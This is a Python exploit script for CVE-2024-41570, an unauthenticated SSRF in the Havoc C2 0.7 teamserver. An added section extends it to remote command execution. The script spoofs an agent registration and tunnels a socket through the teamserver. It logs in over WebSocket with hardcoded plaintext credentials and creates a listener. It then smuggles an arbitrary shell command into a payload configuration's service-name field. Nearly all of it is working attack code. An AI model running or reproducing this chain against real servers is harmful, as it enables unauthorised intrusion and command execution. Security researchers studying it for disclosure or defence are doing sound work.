Copy # Exploit Title: Havoc C2 0.7 Unauthenticated SSRF
# Date: 2024-07-13
# Exploit Author: @_chebuya
# Software Link: https://github.com/HavocFramework/Havoc
# Version: v0.7
# Tested on: Ubuntu 20.04 LTS
# CVE: CVE-2024-41570
# Description: This exploit works by spoofing a demon agent registration and checkins to open a TCP socket on the teamserver and read/write data from it. This allows attackers to leak origin IPs of teamservers and much more.
# Github: https://github.com/chebuya/Havoc-C2-SSRF-poc
# Blog: https://blog.chebuya.com/posts/server-side-request-forgery-on-havoc-c2/
#########################
### Updated by: WoyAg ###
#########################
from base64 import b64encode
from Crypto.Cipher import AES
from Crypto.Util import Counter
from hashlib import sha3_256
import argparse
import json
import random
import requests
requests.packages.urllib3.disable_warnings()
key_bytes = 32
def decrypt(key, iv, ciphertext):
if len(key) <= key_bytes:
for _ in range(len(key), key_bytes):
key += b"0"
assert len(key) == key_bytes
iv_int = int(iv.hex(), 16)
ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)
aes = AES.new(key, AES.MODE_CTR, counter=ctr)
plaintext = aes.decrypt(ciphertext)
return plaintext
def int_to_bytes(value, length=4, byteorder="big"):
return value.to_bytes(length, byteorder)
def encrypt(key, iv, plaintext):
if len(key) <= key_bytes:
for x in range(len(key), key_bytes):
key = key + b"0"
assert len(key) == key_bytes
iv_int = int(iv.hex(), 16)
ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)
aes = AES.new(key, AES.MODE_CTR, counter=ctr)
ciphertext = aes.encrypt(plaintext)
return ciphertext
def register_agent(hostname, username, domain_name, internal_ip, process_name, process_id):
command = b"\x00\x00\x00\x63"
request_id = b"\x00\x00\x00\x01"
demon_id = agent_id
hostname_length = int_to_bytes(len(hostname))
username_length = int_to_bytes(len(username))
domain_name_length = int_to_bytes(len(domain_name))
internal_ip_length = int_to_bytes(len(internal_ip))
process_name_length = int_to_bytes(len(process_name) - 6)
data = b"\xab" * 100
header_data = command + request_id + AES_Key + AES_IV + demon_id + hostname_length + hostname + username_length + username + domain_name_length + domain_name + internal_ip_length + internal_ip + process_name_length + process_name + process_id + data
size = 12 + len(header_data)
size_bytes = size.to_bytes(4, 'big')
agent_header = size_bytes + magic + agent_id
print("[***] Trying to register agent...")
r = requests.post(teamserver_listener_url, data=agent_header + header_data, headers=headers, verify=False)
if r.status_code == 200:
print("[***] Success!")
else:
print(f"[!!!] Failed to register agent - {r.status_code} {r.text}")
def open_socket(socket_id, target_address, target_port):
command = b"\x00\x00\x09\xec"
request_id = b"\x00\x00\x00\x02"
subcommand = b"\x00\x00\x00\x10"
sub_request_id = b"\x00\x00\x00\x03"
local_addr = b"\x22\x22\x22\x22"
local_port = b"\x33\x33\x33\x33"
forward_addr = b""
for octet in target_address.split(".")[::-1]:
forward_addr += int_to_bytes(int(octet), length=1)
forward_port = int_to_bytes(target_port)
package = subcommand + socket_id + local_addr + local_port + forward_addr + forward_port
package_size = int_to_bytes(len(package) + 4)
header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package)
size = 12 + len(header_data)
size_bytes = size.to_bytes(4, 'big')
agent_header = size_bytes + magic + agent_id
data = agent_header + header_data
print("[***] Trying to open socket on the teamserver...")
r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False)
if r.status_code == 200:
print("[***] Success!")
else:
print(f"[!!!] Failed to open socket on teamserver - {r.status_code} {r.text}")
def write_socket(socket_id, data):
command = b"\x00\x00\x09\xec"
request_id = b"\x00\x00\x00\x08"
subcommand = b"\x00\x00\x00\x11"
sub_request_id = b"\x00\x00\x00\xa1"
socket_type = b"\x00\x00\x00\x03"
success = b"\x00\x00\x00\x01"
data_length = int_to_bytes(len(data))
package = subcommand + socket_id + socket_type + success + data_length + data
package_size = int_to_bytes(len(package) + 4)
header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package)
size = 12 + len(header_data)
size_bytes = size.to_bytes(4, 'big')
agent_header = size_bytes + magic + agent_id
post_data = agent_header + header_data
print("[***] Trying to write to the socket")
r = requests.post(teamserver_listener_url, data=post_data, headers=headers, verify=False)
if r.status_code == 200:
print("[***] Success!")
else:
print(f"[!!!] Failed to write data to the socket - {r.status_code} {r.text}")
def read_socket(socket_id):
command = b"\x00\x00\x00\x01"
request_id = b"\x00\x00\x00\x09"
header_data = command + request_id
size = 12 + len(header_data)
size_bytes = size.to_bytes(4, 'big')
agent_header = size_bytes + magic + agent_id
data = agent_header + header_data
print("[***] Trying to poll teamserver for socket output...")
r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False)
if r.status_code == 200:
print("[***] Read socket output successfully!")
else:
print(f"[!!!] Failed to read socket output - {r.status_code} {r.text}")
return ""
command_id = int.from_bytes(r.content[0:4], "little")
request_id = int.from_bytes(r.content[4:8], "little")
package_size = int.from_bytes(r.content[8:12], "little")
enc_package = r.content[12:]
return decrypt(AES_Key, AES_IV, enc_package)[12:]
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help="The listener target in URL format", required=True)
parser.add_argument("-i", "--ip", help="The IP to open the socket with", required=True)
parser.add_argument("-p", "--port", help="The port to open the socket with", required=True)
parser.add_argument("-A", "--user-agent", help="The User-Agent for the spoofed agent", default="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36")
parser.add_argument("-H", "--hostname", help="The hostname for the spoofed agent", default="DESKTOP-7F61JT1")
parser.add_argument("-u", "--username", help="The username for the spoofed agent", default="Administrator")
parser.add_argument("-d", "--domain-name", help="The domain name for the spoofed agent", default="ECORP")
parser.add_argument("-n", "--process-name", help="The process name for the spoofed agent", default="msedge.exe")
parser.add_argument("-ip", "--internal-ip", help="The internal ip for the spoofed agent", default="10.1.33.7")
parser.add_argument("-c", "--cmd", help="Command to run", default="sleep 5")
args = parser.parse_args()
magic = b"\xde\xad\xbe\xef"
teamserver_listener_url = args.target
headers = { "User-Agent": args.user_agent }
agent_id = int_to_bytes(random.randint(100000, 1000000))
AES_Key = b"\x00" * 32
AES_IV = b"\x00" * 16
hostname = bytes(args.hostname, encoding="utf-8")
username = bytes(args.username, encoding="utf-8")
domain_name = bytes(args.domain_name, encoding="utf-8")
internal_ip = bytes(args.internal_ip, encoding="utf-8")
process_name = args.process_name.encode("utf-16le")
process_id = int_to_bytes(random.randint(1000, 5000))
register_agent(hostname, username, domain_name, internal_ip, process_name, process_id)
socket_id = b"\x11\x11\x11\x11"
open_socket(socket_id, args.ip, int(args.port))
############################################################################################################
########################### CUSTOM ###########################
############################################################################################################
def create_websocket_frame(payload, opcode=1, fin=True, mask=True):
"""
Creates a raw WebSocket frame according to RFC 6455.
Args:
payload (bytes): The data to be sent in the frame.
opcode (int, optional): Opcode defining the frame type. Defaults to 1 (text frame).
fin (bool, optional): FIN bit indicating if this is the final frame. Defaults to True.
mask (bool, optional): Whether to mask the payload. Defaults to True (required for client frames).
Returns:
bytes: The raw WebSocket frame as bytes.
"""
if not isinstance(payload, bytes):
payload = payload.encode()
# First byte: FIN (bit 7) and opcode (bits 3-0)
first_byte = (0x80 if fin else 0x00) | (opcode & 0x0F)
# Second byte: MASK (bit 7) and payload length
payload_length = len(payload)
second_byte = (0x80 if mask else 0x00) | (
126 if payload_length > 125 else 127 if payload_length > 65535 else payload_length
)
# Extended length for payloads > 125 bytes
extended_length = (
payload_length.to_bytes(2, 'big') if 126 <= payload_length <= 65535 else
payload_length.to_bytes(8, 'big') if payload_length > 65535 else b''
)
# Mask the payload if required
mask_key = random.urandom(4) if mask else b''
masked_payload = bytes([payload[i] ^ mask_key[i % 4] for i in range(payload_length)]) if mask else payload
# Assemble the frame
return bytes([first_byte, second_byte]) + extended_length + mask_key + masked_payload
def write_and_read_socket(socket_id, request_data):
write_socket(socket_id, request_data)
print(read_socket(socket_id).decode())
USER = "ilya"
PASSWORD = "CobaltStr1keSuckz!"
host = "127.0.0.1"
port = 40056
websocket_key = b64encode(random.randbytes(16)).decode()
init_connection = f'''GET /havoc/ HTTP/1.1
Host: {args.ip}:{args.port}
Upgrade: websocket
Sec-WebSocket-Key: {websocket_key}
Sec-WebSocket-Version: 13
Connection: Upgrade
'''
print(init_connection)
write_and_read_socket(socket_id, init_connection.encode())
auth_to_teamserver = {
"Body": {
"Info": {
"Password": sha3_256(PASSWORD.encode()).hexdigest(),
"User": USER
},
"SubEvent": 3
},
"Head": {
"Event": 1,
"OneTime": "",
"Time": "18:40:17",
"User": USER
}
}
auth_to_teamserver = json.dumps(auth_to_teamserver)
print(auth_to_teamserver)
write_and_read_socket(socket_id, create_websocket_frame(auth_to_teamserver))
payload = {"Body":{"Info":{"Headers":"","HostBind":"0.0.0.0","HostHeader":"","HostRotation":"round-robin","Hosts":"0.0.0.0","Name":"abc","PortBind":"443","PortConn":"443","Protocol":"Https","Proxy Enabled":"false","Secure":"true","Status":"online","Uris":"","UserAgent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"},"SubEvent":1},"Head":{"Event":2,"OneTime":"","Time":"08:39:18","User": USER}}
create_listener = {
"Body": {
"Info": {
"Headers": "",
"HostBind": "0.0.0.0",
"HostHeader": "",
"HostRotation": "round-robin",
"Hosts": "0.0.0.0",
"Name": "letmein",
"PortBind": "443",
"PortConn": "443",
"Protocol": "Https",
"Proxy Enabled": "false",
"Secure": "true",
"Status": "online",
"Uris": "",
"UserAgent": "LetMeIn"
},
"SubEvent": 1
},
"Head": {
"Event": 2,
"OneTime": "",
"Time": "08:39:18",
"User": "USER"
}
}
create_listener = json.dumps(create_listener)
print(create_listener)
write_and_read_socket(socket_id, create_websocket_frame(create_listener))
payload = {"Body": {"Info": {"AgentType": "Demon", "Arch": "x64", "Config": "{\n \"Amsi/Etw Patch\": \"None\",\n \"Indirect Syscall\": false,\n \"Injection\": {\n \"Alloc\": \"Native/Syscall\",\n \"Execute\": \"Native/Syscall\",\n \"Spawn32\": \"C:\\\\Windows\\\\SysWOW64\\\\notepad.exe\",\n \"Spawn64\": \"C:\\\\Windows\\\\System32\\\\notepad.exe\"\n },\n \"Jitter\": \"0\",\n \"Proxy Loading\": \"None (LdrLoadDll)\",\n \"Service Name\":\"XinjectionX\",\n \"Sleep\": \"2\",\n \"Sleep Jmp Gadget\": \"None\",\n \"Sleep Technique\": \"WaitForSingleObjectEx\",\n \"Stack Duplication\": false\n}\n", "Format": "Windows Service Exe", "Listener": "letmein"}, "SubEvent": 2}, "Head": { "Event": 5, "OneTime": "true", "Time": "18:39:04", "User": "XUSERX"}}
############################################################################################################
injection = """ \\\\\\\" -mbla; """ + args.cmd + """ 1>&2 && false #"""
injection_config = ('''
{
"Amsi/Etw Patch": "None",
"Indirect Syscall": false,
"Injection": {
"Alloc": "Native/Syscall",
"Execute": "Native/Syscall",
"Spawn32": "C:\\\\Windows\\\\SysWOW64\\notepad.exe",
"Spawn64": "C:\\\\Windows\\\\System32\\notepad.exe"
},
"Jitter": "0",
"Proxy Loading": "None (LdrLoadDll)",
"Service Name":"%s",
"Sleep": "2",
"Sleep Jmp Gadget": "None",
"Sleep Technique": "WaitForSingleObjectEx",
"Stack Duplication": false
}
''' % injection).strip()
injection_request = {
"Body": {
"Info": {
"AgentType": "Demon",
"Arch": "x64",
"Config": injection_config,
"Format": "Windows Service Exe",
"Listener": "letmein"
},
"SubEvent": 2
},
"Head": {
"Event": 5,
"OneTime": "true",
"Time": "18:39:04",
"User": USER
}
}
injection_request = json.dumps(injection_request)
print(injection_request)
write_and_read_socket(socket_id, create_websocket_frame(injection_request))